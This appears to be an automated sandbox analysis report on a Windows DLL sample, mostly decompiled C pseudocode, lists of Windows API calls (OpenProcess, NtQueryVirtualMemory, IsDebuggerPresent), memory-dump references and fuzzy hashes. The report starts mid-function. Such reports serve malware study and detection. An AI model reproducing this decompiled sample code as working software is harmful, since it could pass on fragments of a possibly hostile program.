                                                                                                            						L5:
                                                                                                            						 *0x6f0341ac = _t3;
                                                                                                            						_t5 = GetCurrentProcessId();
                                                                                                            						 *0x6f0341a8 = _t5;
                                                                                                            						 *0x6f0341b0 = _t10;
                                                                                                            						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                            						 *0x6f0341a4 = _t6;
                                                                                                            						if(_t6 == 0) {
                                                                                                            							 *0x6f0341a4 =  *0x6f0341a4 | 0xffffffff;
                                                                                                            						}
                                                                                                            						return 0;
                                                                                                            					} else {
                                                                                                            						_t14 = _t3 - _t3;
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F0315D1), ref: 6F031834
                                                                                                            • GetVersion.KERNEL32 ref: 6F031843
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 6F03185F
                                                                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F031878
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 845504543-1084903527
                                                                                                            • Opcode ID: 2a8189c008921a7a0d9ae9efde1af3d69e70d9a4a9139238f4533ef82137563f
                                                                                                            • Instruction ID: 5baacd8f0bdbf94f9811717da4eba3db19a145679c2ed3cdace65c050c397667
                                                                                                            • Opcode Fuzzy Hash: 2a8189c008921a7a0d9ae9efde1af3d69e70d9a4a9139238f4533ef82137563f
                                                                                                            • Instruction Fuzzy Hash: F5F03137D49E13AFEF204B685C667953BA1FB0B731F00401AE501CE1C4D7719061AB58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 597776487-0
                                                                                                            • Opcode ID: a64270379c8960435699c4d253d761e3798754f4a2174fde46508d94bf993c15
                                                                                                            • Instruction ID: 02289ff33f40289090c1b58290c6c4d0417d53395070ad23ffbfcf0b338e8d53
                                                                                                            • Opcode Fuzzy Hash: a64270379c8960435699c4d253d761e3798754f4a2174fde46508d94bf993c15
                                                                                                            • Instruction Fuzzy Hash: 81C11371A08209DFDF108F78CC40BAE7BFDAF86364F14656AD5A49B281F731AA41A750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F2FB
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F331
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6F09EB2D
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6F09EB76
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6F09EB85
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6F09EBCD
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6F09EBEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 949163717-0
                                                                                                            • Opcode ID: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction ID: f7c5c2cede04a5099c9d5b96f66da20424d4ed8fbe69b65b7d2ef50b0a75e124
                                                                                                            • Opcode Fuzzy Hash: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction Fuzzy Hash: 5F515A71A0060AEAEF00DFA5CC44BAFB7B8BF09305F04556AE925E7191F770A940AB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6F076DAB
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F076DB5
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6F076DC2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: e86b1dd151493775c40ab80f0acd7ece56b37bc1521915a57987e69307231db1
                                                                                                            • Instruction ID: bf6be8b09490094c11634ec10d09dfcdf8b8b8d3ff60b8287c49efa626de73c7
                                                                                                            • Opcode Fuzzy Hash: e86b1dd151493775c40ab80f0acd7ece56b37bc1521915a57987e69307231db1
                                                                                                            • Instruction Fuzzy Hash: 7131A4B591132C9BCB61DF64D9887DDBBB8AF08314F5041EAE41CA7290EB709F858F54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,?,6F08C324,?,000000FF,?,?,?,00000004), ref: 6F08C347
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,6F08C324,?,000000FF,?,?,?,00000004), ref: 6F08C34E
                                                                                                            • ExitProcess.KERNEL32 ref: 6F08C360
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 0af79f3ee5c772d193636ada7d325ac9672c88b9faacb1c58557a4530b992f48
                                                                                                            • Instruction ID: 50653d2b263ec9f35bb73b2c486fb6b7cbe2882fd75b05a1b423958e00d9ffa9
                                                                                                            • Opcode Fuzzy Hash: 0af79f3ee5c772d193636ada7d325ac9672c88b9faacb1c58557a4530b992f48
                                                                                                            • Instruction Fuzzy Hash: 1AE0EC71000A4CAFCF026F64CA58F4D3FB9FF45259F404514F9158A122DB35E992EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                            • Instruction ID: 8e77da2fdcc7a3872fd9b8529fe90d605efeb32ff1f89ed5e48741b923e9e59e
                                                                                                            • Opcode Fuzzy Hash: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                            • Instruction Fuzzy Hash: 22F11E71E052199BDB24CFA8C99079DF7F2FF89314F1582AAD819AB344DB31A901CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F0323D5(long _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				signed int _v16;
                                                                                                            				short* _v32;
                                                                                                            				void _v36;
                                                                                                            				void* _t57;
                                                                                                            				signed int _t58;
                                                                                                            				signed int _t61;
                                                                                                            				signed int _t62;
                                                                                                            				void* _t63;
                                                                                                            				signed int* _t68;
                                                                                                            				intOrPtr* _t69;
                                                                                                            				intOrPtr* _t71;
                                                                                                            				intOrPtr _t72;
                                                                                                            				intOrPtr _t75;
                                                                                                            				void* _t76;
                                                                                                            				signed int _t77;
                                                                                                            				void* _t78;
                                                                                                            				void _t80;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t86;
                                                                                                            				short* _t87;
                                                                                                            				void* _t89;
                                                                                                            				signed int* _t90;
                                                                                                            				long _t91;
                                                                                                            				signed int _t93;
                                                                                                            				signed int _t94;
                                                                                                            				signed int _t100;
                                                                                                            				signed int _t102;
                                                                                                            				void* _t104;
                                                                                                            				long _t108;
                                                                                                            				signed int _t110;
                                                                                                            
                                                                                                            				_t108 = _a4;
                                                                                                            				_t76 =  *(_t108 + 8);
                                                                                                            				if((_t76 & 0x00000003) != 0) {
                                                                                                            					L3:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_a4 =  *[fs:0x4];
                                                                                                            				_v8 =  *[fs:0x8];
                                                                                                            				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                            					_t102 =  *(_t108 + 0xc);
                                                                                                            					__eflags = _t102 - 0xffffffff;
                                                                                                            					if(_t102 != 0xffffffff) {
                                                                                                            						_t91 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						_a4 = 0;
                                                                                                            						_t57 = _t76;
                                                                                                            						do {
                                                                                                            							_t80 =  *_t57;
                                                                                                            							__eflags = _t80 - 0xffffffff;
                                                                                                            							if(_t80 == 0xffffffff) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							__eflags = _t80 - _t91;
                                                                                                            							if(_t80 >= _t91) {
                                                                                                            								L20:
                                                                                                            								_t63 = 0;
                                                                                                            								L60:
                                                                                                            								return _t63;
                                                                                                            							}
                                                                                                            							L9:
                                                                                                            							__eflags =  *(_t57 + 4);
                                                                                                            							if( *(_t57 + 4) != 0) {
                                                                                                            								_t12 =  &_a4;
                                                                                                            								 *_t12 = _a4 + 1;
                                                                                                            								__eflags =  *_t12;
                                                                                                            							}
                                                                                                            							_t91 = _t91 + 1;
                                                                                                            							_t57 = _t57 + 0xc;
                                                                                                            							__eflags = _t91 - _t102;
                                                                                                            						} while (_t91 <= _t102);
                                                                                                            						__eflags = _a4;
                                                                                                            						if(_a4 == 0) {
                                                                                                            							L15:
                                                                                                            							_t81 =  *0x6f0341f8;
                                                                                                            							_t110 = _t76 & 0xfffff000;
                                                                                                            							_t58 = 0;
                                                                                                            							__eflags = _t81;
                                                                                                            							if(_t81 <= 0) {
                                                                                                            								L18:
                                                                                                            								_t104 = _t102 | 0xffffffff;
                                                                                                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                            								__eflags = _t61;
                                                                                                            								if(_t61 < 0) {
                                                                                                            									_t62 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            								} else {
                                                                                                            									_t62 = _a4;
                                                                                                            								}
                                                                                                            								__eflags = _t62;
                                                                                                            								if(_t62 == 0) {
                                                                                                            									L59:
                                                                                                            									_t63 = _t104;
                                                                                                            									goto L60;
                                                                                                            								} else {
                                                                                                            									__eflags = _v12 - 0x1000000;
                                                                                                            									if(_v12 != 0x1000000) {
                                                                                                            										goto L59;
                                                                                                            									}
                                                                                                            									__eflags = _v16 & 0x000000cc;
                                                                                                            									if((_v16 & 0x000000cc) == 0) {
                                                                                                            										L46:
                                                                                                            										_t63 = 1;
                                                                                                            										 *0x6f034240 = 1;
                                                                                                            										__eflags =  *0x6f034240;
                                                                                                            										if( *0x6f034240 != 0) {
                                                                                                            											goto L60;
                                                                                                            										}
                                                                                                            										_t84 =  *0x6f0341f8;
                                                                                                            										__eflags = _t84;
                                                                                                            										_t93 = _t84;
                                                                                                            										if(_t84 <= 0) {
                                                                                                            											L51:
                                                                                                            											__eflags = _t93;
                                                                                                            											if(_t93 != 0) {
                                                                                                            												L58:
                                                                                                            												 *0x6f034240 = 0;
                                                                                                            												goto L5;
                                                                                                            											}
                                                                                                            											_t77 = 0xf;
                                                                                                            											__eflags = _t84 - _t77;
                                                                                                            											if(_t84 <= _t77) {
                                                                                                            												_t77 = _t84;
                                                                                                            											}
                                                                                                            											_t94 = 0;
                                                                                                            											__eflags = _t77;
                                                                                                            											if(_t77 < 0) {
                                                                                                            												L56:
                                                                                                            												__eflags = _t84 - 0x10;
                                                                                                            												if(_t84 < 0x10) {
                                                                                                            													_t86 = _t84 + 1;
                                                                                                            													__eflags = _t86;
                                                                                                            													 *0x6f0341f8 = _t86;
                                                                                                            												}
                                                                                                            												goto L58;
                                                                                                            											} else {
                                                                                                            												do {
                                                                                                            													_t68 = 0x6f034200 + _t94 * 4;
                                                                                                            													_t94 = _t94 + 1;
                                                                                                            													__eflags = _t94 - _t77;
                                                                                                            													 *_t68 = _t110;
                                                                                                            													_t110 =  *_t68;
                                                                                                            												} while (_t94 <= _t77);
                                                                                                            												goto L56;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										_t69 = 0x6f0341fc + _t84 * 4;
                                                                                                            										while(1) {
                                                                                                            											__eflags =  *_t69 - _t110;
                                                                                                            											if( *_t69 == _t110) {
                                                                                                            												goto L51;
                                                                                                            											}
                                                                                                            											_t93 = _t93 - 1;
                                                                                                            											_t69 = _t69 - 4;
                                                                                                            											__eflags = _t93;
                                                                                                            											if(_t93 > 0) {
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L51;
                                                                                                            										}
                                                                                                            										goto L51;
                                                                                                            									}
                                                                                                            									_t87 = _v32;
                                                                                                            									__eflags =  *_t87 - 0x5a4d;
                                                                                                            									if( *_t87 != 0x5a4d) {
                                                                                                            										goto L59;
                                                                                                            									}
                                                                                                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                            									__eflags =  *_t71 - 0x4550;
                                                                                                            									if( *_t71 != 0x4550) {
                                                                                                            										goto L59;
                                                                                                            									}
                                                                                                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                            										goto L59;
                                                                                                            									}
                                                                                                            									_t78 = _t76 - _t87;
                                                                                                            									__eflags =  *((short*)(_t71 + 6));
                                                                                                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                            									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                            										goto L59;
                                                                                                            									}
                                                                                                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                            									__eflags = _t78 - _t72;
                                                                                                            									if(_t78 < _t72) {
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L16:
                                                                                                            								__eflags =  *((intOrPtr*)(0x6f034200 + _t58 * 4)) - _t110;
                                                                                                            								if( *((intOrPtr*)(0x6f034200 + _t58 * 4)) == _t110) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t58 = _t58 + 1;
                                                                                                            								__eflags = _t58 - _t81;
                                                                                                            								if(_t58 < _t81) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							__eflags = _t58;
                                                                                                            							if(_t58 <= 0) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            							 *0x6f034240 = 1;
                                                                                                            							__eflags =  *0x6f034240;
                                                                                                            							if( *0x6f034240 != 0) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            							__eflags =  *((intOrPtr*)(0x6f034200 + _t58 * 4)) - _t110;
                                                                                                            							if( *((intOrPtr*)(0x6f034200 + _t58 * 4)) == _t110) {
                                                                                                            								L32:
                                                                                                            								_t100 = 0;
                                                                                                            								__eflags = _t58;
                                                                                                            								if(_t58 < 0) {
                                                                                                            									L34:
                                                                                                            									 *0x6f034240 = 0;
                                                                                                            									goto L5;
                                                                                                            								} else {
                                                                                                            									goto L33;
                                                                                                            								}
                                                                                                            								do {
                                                                                                            									L33:
                                                                                                            									_t90 = 0x6f034200 + _t100 * 4;
                                                                                                            									_t100 = _t100 + 1;
                                                                                                            									__eflags = _t100 - _t58;
                                                                                                            									 *_t90 = _t110;
                                                                                                            									_t110 =  *_t90;
                                                                                                            								} while (_t100 <= _t58);
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							_t58 = _t81 - 1;
                                                                                                            							__eflags = _t58;
                                                                                                            							if(_t58 < 0) {
                                                                                                            								L28:
                                                                                                            								__eflags = _t81 - 0x10;
                                                                                                            								if(_t81 < 0x10) {
                                                                                                            									_t81 = _t81 + 1;
                                                                                                            									__eflags = _t81;
                                                                                                            									 *0x6f0341f8 = _t81;
                                                                                                            								}
                                                                                                            								_t58 = _t81 - 1;
                                                                                                            								goto L32;
                                                                                                            							} else {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L25:
                                                                                                            								__eflags =  *((intOrPtr*)(0x6f034200 + _t58 * 4)) - _t110;
                                                                                                            								if( *((intOrPtr*)(0x6f034200 + _t58 * 4)) == _t110) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t58 = _t58 - 1;
                                                                                                            								__eflags = _t58;
                                                                                                            								if(_t58 >= 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t58;
                                                                                                            							if(__eflags >= 0) {
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L34;
                                                                                                            								}
                                                                                                            								goto L32;
                                                                                                            							}
                                                                                                            							goto L28;
                                                                                                            						}
                                                                                                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                            						__eflags = _t75 - _v8;
                                                                                                            						if(_t75 < _v8) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _t75 - _t108;
                                                                                                            						if(_t75 >= _t108) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					_t63 = 1;
                                                                                                            					goto L60;
                                                                                                            				} else {
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            			}




































                                                                                                            0x6f032515
                                                                                                            0x6f032515
                                                                                                            0x6f03251c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032522
                                                                                                            0x6f032526
                                                                                                            0x6f032582
                                                                                                            0x6f032584
                                                                                                            0x6f03258c
                                                                                                            0x6f03258e
                                                                                                            0x6f032590
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032592
                                                                                                            0x6f032598
                                                                                                            0x6f03259a
                                                                                                            0x6f03259c
                                                                                                            0x6f0325b1
                                                                                                            0x6f0325b1
                                                                                                            0x6f0325b3
                                                                                                            0x6f0325e2
                                                                                                            0x6f0325e9
                                                                                                            0x00000000
                                                                                                            0x6f0325e9
                                                                                                            0x6f0325b7
                                                                                                            0x6f0325b8
                                                                                                            0x6f0325ba
                                                                                                            0x6f0325bc
                                                                                                            0x6f0325bc
                                                                                                            0x6f0325be
                                                                                                            0x6f0325c0
                                                                                                            0x6f0325c2
                                                                                                            0x6f0325d6
                                                                                                            0x6f0325d6
                                                                                                            0x6f0325d9
                                                                                                            0x6f0325db
                                                                                                            0x6f0325db
                                                                                                            0x6f0325dc
                                                                                                            0x6f0325dc
                                                                                                            0x00000000
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325cd
                                                                                                            0x6f0325ce
                                                                                                            0x6f0325d0
                                                                                                            0x6f0325d2
                                                                                                            0x6f0325d2
                                                                                                            0x00000000
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325c2
                                                                                                            0x6f03259e
                                                                                                            0x6f0325a5
                                                                                                            0x6f0325a5
                                                                                                            0x6f0325a7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0325a9
                                                                                                            0x6f0325aa
                                                                                                            0x6f0325ad
                                                                                                            0x6f0325af
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0325af
                                                                                                            0x00000000
                                                                                                            0x6f0325a5
                                                                                                            0x6f032528
                                                                                                            0x6f03252b
                                                                                                            0x6f032530
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032539
                                                                                                            0x6f03253b
                                                                                                            0x6f032541
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032547
                                                                                                            0x6f03254d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032553
                                                                                                            0x6f032555
                                                                                                            0x6f03255e
                                                                                                            0x6f032562
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032568
                                                                                                            0x6f03256b
                                                                                                            0x6f03256d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032574
                                                                                                            0x6f032576
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032578
                                                                                                            0x6f03257c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03257c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032467
                                                                                                            0x6f032467
                                                                                                            0x6f032467
                                                                                                            0x6f03246e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032470
                                                                                                            0x6f032471
                                                                                                            0x6f032473
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032473
                                                                                                            0x6f03249b
                                                                                                            0x6f03249d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324ad
                                                                                                            0x6f0324af
                                                                                                            0x6f0324b1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324b7
                                                                                                            0x6f0324be
                                                                                                            0x6f0324ea
                                                                                                            0x6f0324ea
                                                                                                            0x6f0324ec
                                                                                                            0x6f0324ee
                                                                                                            0x6f032502
                                                                                                            0x6f032504
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324f9
                                                                                                            0x6f0324fa
                                                                                                            0x6f0324fc
                                                                                                            0x6f0324fe
                                                                                                            0x6f0324fe
                                                                                                            0x00000000
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324c0
                                                                                                            0x6f0324c3
                                                                                                            0x6f0324c5
                                                                                                            0x6f0324d7
                                                                                                            0x6f0324d7
                                                                                                            0x6f0324da
                                                                                                            0x6f0324dc
                                                                                                            0x6f0324dc
                                                                                                            0x6f0324dd
                                                                                                            0x6f0324dd
                                                                                                            0x6f0324e3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324c7
                                                                                                            0x6f0324c7
                                                                                                            0x6f0324c7
                                                                                                            0x6f0324ce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324d0
                                                                                                            0x6f0324d0
                                                                                                            0x6f0324d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324d1
                                                                                                            0x6f0324d3
                                                                                                            0x6f0324d5
                                                                                                            0x6f0324e8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324e8
                                                                                                            0x00000000
                                                                                                            0x6f0324d5
                                                                                                            0x6f032447
                                                                                                            0x6f03244a
                                                                                                            0x6f03244d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03244f
                                                                                                            0x6f032451
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032451
                                                                                                            0x6f032416
                                                                                                            0x6f032418
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6F032486
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MemoryQueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2850889275-0
                                                                                                            • Opcode ID: 32b31e6d03a1ebbb091fd021124373b219e844d504206b82c32bfcec8092d49b
                                                                                                            • Instruction ID: 12af81ace2adb0b5311cdec797dd3d76cb4733b7b88228c5571d1a8e1c391d7c
                                                                                                            • Opcode Fuzzy Hash: 32b31e6d03a1ebbb091fd021124373b219e844d504206b82c32bfcec8092d49b
                                                                                                            • Instruction Fuzzy Hash: 4261B433E046339FDB19CE28D9A075973F1FF85314B668569D856CB284E731EA82C6D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09E4D3,00000001,00000000,?,-00000050,?,6F09EB01,00000000,?,?,?,00000055,?), ref: 6F09E41F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2417226690-0
                                                                                                            • Opcode ID: b1cf89e52e568a2ef35737654653f4cd3cd9b47912086058892b1197ee770050
                                                                                                            • Instruction ID: 51805fe9450a12945ad9cdf7491062e230ac7b9b42ec5f5d9c949387a3b64e0e
                                                                                                            • Opcode Fuzzy Hash: b1cf89e52e568a2ef35737654653f4cd3cd9b47912086058892b1197ee770050
                                                                                                            • Instruction Fuzzy Hash: DD114C376047059FDB189F39C8947AAB7E2FF80328B14843DE9868BA40E371B942DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09E726,00000001,00000000,?,-00000050,?,6F09EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6F09E492
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2417226690-0
                                                                                                            • Opcode ID: 678d8fece3a7e014b813894f42e34553aa5817a7d1ab223615d9d850976d9ac5
                                                                                                            • Instruction ID: 248ec74454ff6458901016a63db1598f1f91d200e9c84f18a07fe915082e8903
                                                                                                            • Opcode Fuzzy Hash: 678d8fece3a7e014b813894f42e34553aa5817a7d1ab223615d9d850976d9ac5
